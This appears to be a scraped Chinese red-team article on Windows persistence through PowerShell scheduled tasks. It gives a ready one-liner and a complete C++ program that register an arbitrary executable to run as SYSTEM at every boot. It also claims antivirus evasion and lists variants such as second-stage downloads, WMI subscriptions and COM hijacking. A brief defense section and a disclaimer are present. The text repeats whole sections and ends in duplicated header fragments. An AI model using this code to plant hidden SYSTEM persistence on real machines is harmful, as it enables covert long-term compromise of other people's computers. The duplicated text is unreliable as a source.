红队权限维持策略——实用版技术文档<\/h1>

0. 前言<\/h2>
本文档详细讲解一种基于PowerShell计划任务的红队权限维持技术，该技术能够绕过常见杀毒软件检测，实现权限提升和持久化。文档包含原理分析、核心命令详解、代码实现及完整示例。<\/p>
免责声明<\/strong>：本技术仅用于合法安全测试和研究，禁止用于非法用途，使用者需自行承担法律责任。<\/p>

1. 技术原理<\/h2>
1.1 核心思路<\/h3>
通过PowerShell注册系统计划任务，配置为系统启动时自动执行，利用Windows API创建和管理进程，实现权限维持。<\/p>
1.2 技术优势<\/h3>

绕过常见杀毒软件检测<\/li>
可实现权限提升(SYSTEM权限)<\/li>
持久化效果良好(系统启动触发)<\/li>
操作隐蔽性较高<\/li> <\/ul>
2. 核心组件详解<\/h2>
2.1 Register-ScheduledTask命令<\/h3>
2.1.1 功能概述<\/h4>
Register-ScheduledTask<\/code>是PowerShell提供的Cmdlet，用于注册或更新计划任务，可配置任务操作、触发条件等参数。<\/p>
2.1.2 完整语法<\/h4> Register-ScheduledTask <\/span><\/span> [-TaskName] <String> <\/span><\/span> [-Action] <ScheduledTaskAction[]> <\/span><\/span> [[-Trigger] <ScheduledTaskTrigger[]>] <\/span><\/span> [[-Description] <String>] <\/span><\/span> [-User <String>] <\/span><\/span> [-RunLevel <RunLevelType>] <\/span><\/span> [-Force] <\/span><\/span> [-CimSession <CimSession[]>] <\/span><\/span> [-AsJob] <\/span><\/span> [-TaskPath <String>] <\/span><\/span> [-InputObject <CimInstance>] <\/span><\/span> [<CommonParameters>] <\/span><\/span><\/code><\/pre>2.1.3 关键参数详解<\/h4> 参数<\/th> 作用<\/th> 示例值<\/th> 说明<\/th> <\/tr> <\/thead> -TaskName<\/td> 指定任务名称<\/td> "BackupTask"<\/td> 必须唯一<\/td> <\/tr> -Action<\/td> 定义任务执行的操作<\/td> (New-ScheduledTaskAction -Execute "C:\Path\MyScript.exe")<\/code><\/td> 可执行程序或脚本<\/td> <\/tr> -Trigger<\/td> 定义触发条件<\/td> (New-ScheduledTaskTrigger -AtStartup)<\/code><\/td> 系统启动时触发<\/td> <\/tr> -User<\/td> 指定运行账户<\/td> "SYSTEM"<\/td> 系统权限运行<\/td> <\/tr> -RunLevel<\/td> 设置权限级别<\/td> "Highest"<\/td> 管理员权限<\/td> <\/tr> -Description<\/td> 任务描述<\/td> "系统备份任务"<\/td> 可选<\/td> <\/tr> -Force<\/td> 强制覆盖<\/td> -<\/td> 覆盖同名任务<\/td> <\/tr> -TaskPath<\/td> 任务存储路径<\/td> "\CustomTasks"<\/td> 分类管理<\/td> <\/tr> <\/tbody> <\/table> 2.2 辅助命令<\/h3> 2.2.1 New-ScheduledTaskAction<\/h4> 创建任务操作：<\/p> New-ScheduledTaskAction -Execute "C:\Path\Program.exe"<\/span> [-Argument "参数"<\/span>] <\/span><\/span><\/code><\/pre>2.2.2 New-ScheduledTaskTrigger<\/h4> 创建触发器：<\/p> New-ScheduledTaskTrigger -AtStartup # 系统启动时<\/span> <\/span><\/span>New-ScheduledTaskTrigger -Daily -At 8am # 每天8点<\/span> <\/span><\/span><\/code><\/pre>2.2.3 Start-ScheduledTask<\/h4> 立即启动任务：<\/p> Start-ScheduledTask -TaskName "MyTask"<\/span> <\/span><\/span><\/code><\/pre>3. 完整实现方案<\/h2> 3.1 PowerShell单行命令<\/h3> powershell.exe -Command "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'D:\temp\1.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'MyTask' -User 'SYSTEM' -RunLevel Highest -Force; Start-ScheduledTask -TaskName 'MyTask';"<\/span> <\/span><\/span><\/code><\/pre>3.2 C++程序实现<\/h3> 3.2.1 完整代码<\/h4> #include<\/span> <iostream><\/span> <\/span><\/span><\/span>#include<\/span> <windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <string><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> \/\/ 构造PowerShell命令 <\/span><\/span><\/span><\/span> std::<\/span>wstring command =<\/span> L<\/span>"powershell.exe -Command <\/span>\"<\/span>"<\/span> <\/span><\/span> L<\/span>"Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'D:<\/span>\\<\/span>temp<\/span>\\<\/span>1.exe') "<\/span> <\/span><\/span> L<\/span>"-Trigger (New-ScheduledTaskTrigger -AtStartup) "<\/span> <\/span><\/span> L<\/span>"-TaskName 'MyTask' -User 'SYSTEM' -RunLevel Highest -Force; "<\/span> <\/span><\/span> L<\/span>"Start-ScheduledTask -TaskName 'MyTask'; "<\/span> <\/span><\/span> L<\/span>"<\/span>\"<\/span>"<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 准备进程启动信息 <\/span><\/span><\/span><\/span> STARTUPINFO si =<\/span> { sizeof<\/span>(si) }; <\/span><\/span> PROCESS_INFORMATION pi; <\/span><\/span> <\/span><\/span> \/\/ 创建PowerShell进程 <\/span><\/span><\/span><\/span> if<\/span> (CreateProcess( <\/span><\/span> NULL, <\/span><\/span> const_cast<\/span><<\/span>wchar_t<\/span>*><\/span>(command.c_str()), <\/span><\/span> NULL, <\/span><\/span> NULL, <\/span><\/span> FALSE, <\/span><\/span> 0<\/span>, <\/span><\/span> NULL, <\/span><\/span> NULL, <\/span><\/span> &<\/span>si, <\/span><\/span> &<\/span>pi)) { <\/span><\/span> <\/span><\/span> \/\/ 等待进程执行完成 <\/span><\/span><\/span><\/span> WaitForSingleObject(pi.hProcess, INFINITE); <\/span><\/span> <\/span><\/span> \/\/ 释放资源 <\/span><\/span><\/span><\/span> CloseHandle(pi.hProcess); <\/span><\/span> CloseHandle(pi.hThread); <\/span><\/span> <\/span><\/span> std::<\/span>wcout <<<\/span> L<\/span>"任务已创建并开始执行。"<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span> } else<\/span> { <\/span><\/span> std::<\/span>wcerr <<<\/span> L<\/span>"创建进程失败,错误代码: "<\/span> <<<\/span> GetLastError() <<<\/span> std::<\/span>endl; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 防止控制台立即关闭 <\/span><\/span><\/span><\/span> std::<\/span>wcout <<<\/span> L<\/span>"按任意键继续..."<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span> std::<\/span>wcin.get(); <\/span><\/span> <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2.2 关键代码解析<\/h4> 命令构造<\/strong>：<\/p> 使用std::wstring<\/code>构造PowerShell命令<\/li> 包含任务注册和立即启动两部分<\/li> <\/ul> <\/li> 进程创建<\/strong>：<\/p> 使用CreateProcess<\/code>API创建PowerShell进程<\/li> 参数说明： NULL<\/code>: 使用默认应用程序名<\/li> command.c_str()<\/code>: 要执行的命令<\/li> 其他参数保持默认<\/li> <\/ul> <\/li> <\/ul> <\/li> 进程管理<\/strong>：<\/p> WaitForSingleObject<\/code>: 等待进程执行完成<\/li> CloseHandle<\/code>: 释放进程和线程句柄<\/li> <\/ul> <\/li> <\/ol> 4. 防御与检测<\/h2> 4.1 防御措施<\/h3> 限制PowerShell执行权限<\/li> 监控计划任务创建行为<\/li> 审计SYSTEM权限任务<\/li> 启用高级威胁检测<\/li> <\/ol> 4.2 检测指标<\/h3> 可疑的计划任务名称<\/li> 系统启动触发器<\/li> SYSTEM权限运行的任务<\/li> 短时间内任务创建和执行<\/li> <\/ol> 5. 扩展应用<\/h2> 5.1 变体技术<\/h3> 隐藏路径<\/strong>：使用非常规任务路径<\/li> 延迟触发<\/strong>：设置定时触发而非立即执行<\/li> 多级触发<\/strong>：通过第一阶段任务下载执行第二阶段<\/li> <\/ol> 5.2 组合技术<\/h3> 结合WMI事件订阅实现更隐蔽的持久化<\/li> 与注册表Run键结合实现多重持久化<\/li> 通过COM劫持实现无文件持久化<\/li> <\/ol> 6. 注意事项<\/h2> 路径问题<\/strong>：确保目标程序路径存在且可执行<\/li> 权限问题<\/strong>：执行程序需要足够的权限<\/li> 杀软规避<\/strong>：可能需要额外混淆处理<\/li> 环境适配<\/strong>：不同Windows版本可能有差异<\/li> <\/ol> 7. 总结<\/h2> 本文详细介绍了基于计划任务的红队权限维持技术，从原理到实现提供了完整的技术路径。该技术具有较好的隐蔽性和持久性，但也存在相应的检测特征。安全研究人员应了解此类技术以更好地防御相关攻击。<\/p>

参数<\/th>	作用<\/th>	示例值<\/th>	说明<\/th> <\/tr> <\/thead>
-TaskName<\/td>	指定任务名称<\/td>	"BackupTask"<\/td>	必须唯一<\/td> <\/tr>
-Action<\/td>	定义任务执行的操作<\/td>	`(New-ScheduledTaskAction -Execute "C:\Path\MyScript.exe")<\/code><\/td>`	可执行程序或脚本<\/td> <\/tr>
-Trigger<\/td>	定义触发条件<\/td>	`(New-ScheduledTaskTrigger -AtStartup)<\/code><\/td>`	系统启动时触发<\/td> <\/tr>
-User<\/td>	指定运行账户<\/td>	"SYSTEM"<\/td>	系统权限运行<\/td> <\/tr>
-RunLevel<\/td>	设置权限级别<\/td>	"Highest"<\/td>	管理员权限<\/td> <\/tr>
-Description<\/td>	任务描述<\/td>	"系统备份任务"<\/td>	可选<\/td> <\/tr>
-Force<\/td>	强制覆盖<\/td>	-<\/td>	覆盖同名任务<\/td> <\/tr>
-TaskPath<\/td>	任务存储路径<\/td>	"\CustomTasks"<\/td>	分类管理<\/td> <\/tr> <\/tbody> <\/table> 2.2 辅助命令<\/h3> 2.2.1 New-ScheduledTaskAction<\/h4> 创建任务操作：<\/p> New-ScheduledTaskAction -Execute "C:\Path\Program.exe"<\/span> [-Argument "参数"<\/span>] <\/span><\/span><\/code><\/pre>2.2.2 New-ScheduledTaskTrigger<\/h4> 创建触发器：<\/p> New-ScheduledTaskTrigger -AtStartup # 系统启动时<\/span> <\/span><\/span>New-ScheduledTaskTrigger -Daily -At 8am # 每天8点<\/span> <\/span><\/span><\/code><\/pre>2.2.3 Start-ScheduledTask<\/h4> 立即启动任务：<\/p> Start-ScheduledTask -TaskName "MyTask"<\/span> <\/span><\/span><\/code><\/pre>3. 完整实现方案<\/h2> 3.1 PowerShell单行命令<\/h3> powershell.exe -Command "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'D:\temp\1.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'MyTask' -User 'SYSTEM' -RunLevel Highest -Force; Start-ScheduledTask -TaskName 'MyTask';"<\/span> <\/span><\/span><\/code><\/pre>3.2 C++程序实现<\/h3> 3.2.1 完整代码<\/h4> #include<\/span> <iostream><\/span> <\/span><\/span><\/span>#include<\/span> <windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <string><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> \/\/ 构造PowerShell命令 <\/span><\/span><\/span><\/span> std::<\/span>wstring command =<\/span> L<\/span>"powershell.exe -Command <\/span>\"<\/span>"<\/span> <\/span><\/span> L<\/span>"Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'D:<\/span>\\<\/span>temp<\/span>\\<\/span>1.exe') "<\/span> <\/span><\/span> L<\/span>"-Trigger (New-ScheduledTaskTrigger -AtStartup) "<\/span> <\/span><\/span> L<\/span>"-TaskName 'MyTask' -User 'SYSTEM' -RunLevel Highest -Force; "<\/span> <\/span><\/span> L<\/span>"Start-ScheduledTask -TaskName 'MyTask'; "<\/span> <\/span><\/span> L<\/span>"<\/span>\"<\/span>"<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 准备进程启动信息 <\/span><\/span><\/span><\/span> STARTUPINFO si =<\/span> { sizeof<\/span>(si) }; <\/span><\/span> PROCESS_INFORMATION pi; <\/span><\/span> <\/span><\/span> \/\/ 创建PowerShell进程 <\/span><\/span><\/span><\/span> if<\/span> (CreateProcess( <\/span><\/span> NULL, <\/span><\/span> const_cast<\/span><<\/span>wchar_t<\/span>*><\/span>(command.c_str()), <\/span><\/span> NULL, <\/span><\/span> NULL, <\/span><\/span> FALSE, <\/span><\/span> 0<\/span>, <\/span><\/span> NULL, <\/span><\/span> NULL, <\/span><\/span> &<\/span>si, <\/span><\/span> &<\/span>pi)) { <\/span><\/span> <\/span><\/span> \/\/ 等待进程执行完成 <\/span><\/span><\/span><\/span> WaitForSingleObject(pi.hProcess, INFINITE); <\/span><\/span> <\/span><\/span> \/\/ 释放资源 <\/span><\/span><\/span><\/span> CloseHandle(pi.hProcess); <\/span><\/span> CloseHandle(pi.hThread); <\/span><\/span> <\/span><\/span> std::<\/span>wcout <<<\/span> L<\/span>"任务已创建并开始执行。"<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span> } else<\/span> { <\/span><\/span> std::<\/span>wcerr <<<\/span> L<\/span>"创建进程失败,错误代码: "<\/span> <<<\/span> GetLastError() <<<\/span> std::<\/span>endl; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 防止控制台立即关闭 <\/span><\/span><\/span><\/span> std::<\/span>wcout <<<\/span> L<\/span>"按任意键继续..."<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span> std::<\/span>wcin.get(); <\/span><\/span> <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2.2 关键代码解析<\/h4> 命令构造<\/strong>：<\/p> 使用std::wstring<\/code>构造PowerShell命令<\/li> 包含任务注册和立即启动两部分<\/li> <\/ul> <\/li> 进程创建<\/strong>：<\/p> 使用CreateProcess<\/code>API创建PowerShell进程<\/li> 参数说明： NULL<\/code>: 使用默认应用程序名<\/li> command.c_str()<\/code>: 要执行的命令<\/li> 其他参数保持默认<\/li> <\/ul> <\/li> <\/ul> <\/li> 进程管理<\/strong>：<\/p> WaitForSingleObject<\/code>: 等待进程执行完成<\/li> CloseHandle<\/code>: 释放进程和线程句柄<\/li> <\/ul> <\/li> <\/ol> 4. 防御与检测<\/h2> 4.1 防御措施<\/h3> 限制PowerShell执行权限<\/li> 监控计划任务创建行为<\/li> 审计SYSTEM权限任务<\/li> 启用高级威胁检测<\/li> <\/ol> 4.2 检测指标<\/h3> 可疑的计划任务名称<\/li> 系统启动触发器<\/li> SYSTEM权限运行的任务<\/li> 短时间内任务创建和执行<\/li> <\/ol> 5. 扩展应用<\/h2> 5.1 变体技术<\/h3> 隐藏路径<\/strong>：使用非常规任务路径<\/li> 延迟触发<\/strong>：设置定时触发而非立即执行<\/li> 多级触发<\/strong>：通过第一阶段任务下载执行第二阶段<\/li> <\/ol> 5.2 组合技术<\/h3> 结合WMI事件订阅实现更隐蔽的持久化<\/li> 与注册表Run键结合实现多重持久化<\/li> 通过COM劫持实现无文件持久化<\/li> <\/ol> 6. 注意事项<\/h2> 路径问题<\/strong>：确保目标程序路径存在且可执行<\/li> 权限问题<\/strong>：执行程序需要足够的权限<\/li> 杀软规避<\/strong>：可能需要额外混淆处理<\/li> 环境适配<\/strong>：不同Windows版本可能有差异<\/li> <\/ol> 7. 总结<\/h2> 本文详细介绍了基于计划任务的红队权限维持技术，从原理到实现提供了完整的技术路径。该技术具有较好的隐蔽性和持久性，但也存在相应的检测特征。安全研究人员应了解此类技术以更好地防御相关攻击。<\/p>

红队权限维持策略——实用版技术文档<\/h1>

1.1 核心思路<\/h3> 通过PowerShell注册系统计划任务，配置为系统启动时自动执行，利用Windows API创建和管理进程，实现权限维持。<\/p>

2. 核心组件详解<\/h2>

2.1 Register-ScheduledTask命令<\/h3>

2.1.1 功能概述<\/h4> Register-ScheduledTask<\/code>是PowerShell提供的Cmdlet，用于注册或更新计划任务，可配置任务操作、触发条件等参数。<\/p>

2.2 辅助命令<\/h3>

3. 完整实现方案<\/h2>

3.2 C++程序实现<\/h3>

4. 防御与检测<\/h2>

5. 扩展应用<\/h2>

7. 总结<\/h2> 本文详细介绍了基于计划任务的红队权限维持技术，从原理到实现提供了完整的技术路径。该技术具有较好的隐蔽性和持久性，但也存在相应的检测特征。安全研究人员应了解此类技术以更好地防御相关攻击。<\/p>

1.1 核心思路<\/h3>
通过PowerShell注册系统计划任务，配置为系统启动时自动执行，利用Windows API创建和管理进程，实现权限维持。<\/p>

2.1.1 功能概述<\/h4>
`Register-ScheduledTask<\/code>是PowerShell提供的Cmdlet，用于注册或更新计划任务，可配置任务操作、触发条件等参数。<\/p>`

7. 总结<\/h2>
本文详细介绍了基于计划任务的红队权限维持技术，从原理到实现提供了完整的技术路径。该技术具有较好的隐蔽性和持久性，但也存在相应的检测特征。安全研究人员应了解此类技术以更好地防御相关攻击。<\/p>